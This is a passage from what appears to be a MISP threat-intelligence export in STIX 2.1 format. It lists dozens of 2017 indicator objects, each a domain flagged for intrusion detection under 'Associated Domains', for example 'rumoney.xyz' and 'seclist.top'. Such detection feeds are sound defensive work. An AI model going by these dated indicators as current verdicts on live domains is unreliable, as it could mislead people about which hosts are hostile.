|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'nothingmore.us']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6cec-6424-449c-a03f-4803950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'novayarabota.pw']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6ced-3e74-4255-8bfa-4e61950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'nvpn.pw']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6cee-9498-4282-88ab-4b93950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'odejda77.net']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6cef-d934-4a20-a4bd-4e1b950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'okvd.biz']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6cf0-f8ec-4814-9ba9-4393950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'olen.bid']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6cf0-da00-4b18-9546-4682950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'onechat.pw']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6cf1-3b20-4dd0-a4ee-4be9950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'placetobuy.pw']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6cf2-92c4-44cd-ab2c-4265950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'platej.pw']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6cf3-f040-4b9e-b04c-4678950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'poplata-da.org']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6cf4-5d50-4a73-ac91-438a950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'portw.org']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6cf5-e6d4-40a5-90cc-461f950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'powersand.link']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6cf6-35e8-4047-9239-4d2d950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'pricemeet.pw']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6cf6-2b98-429c-991e-42ff950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'puldisk.xyz']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6cf7-be9c-42c0-9608-4099950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'rabotadnya.pw']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6cf8-e29c-4f79-b7d4-47b2950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'raintor.pw']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6cf9-b7f4-4620-a999-485a950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'ricarier.org']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6cfa-f240-44b6-b3d1-489f950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'rosgaz.pw']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6cfb-58f0-4328-8819-46e5950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'rumoney.xyz']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6cfc-0ac8-40a8-9e96-45a8950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'salesforlife.top']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6cfc-6420-44d2-90fa-4d38950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'salesline.top']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6cfd-1454-4041-9826-49e3950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'sam-sam.pw']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6cfe-28d0-4c95-a4dd-47d1950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'sandstyle.biz']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6cff-177c-4f70-8dcd-438f950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'sandw.pw']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6d00-bb70-4804-8d24-4a87950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'santrimo.lol']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6d01-92d4-4dd4-bc5b-4f1f950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'seclist.site']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6d02-3454-4039-870c-4887950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'seclist.top']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6d02-0860-424b-98f9-4b14950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'selenaspace.space']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6d03-3468-4fe4-a628-49f3950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'sellgrax.club']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6d04-d974-4253-9642-4f14950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'semodo.pw']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6d05-b58c-491c-9dcb-48b4950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'sensetunoespossible.cat']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6d06-044c-47be-894f-446c950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'shortsell.trade']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6d07-a1ac-48e1-8f6f-402b950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'shortselling.club']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6d08-9e08-463a-80c6-45e9950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'sixgoats.pw']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6d08-424c-4cbe-8a48-48b2950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'snp500.trade']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6d09-3474-4193-9139-4c0b950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
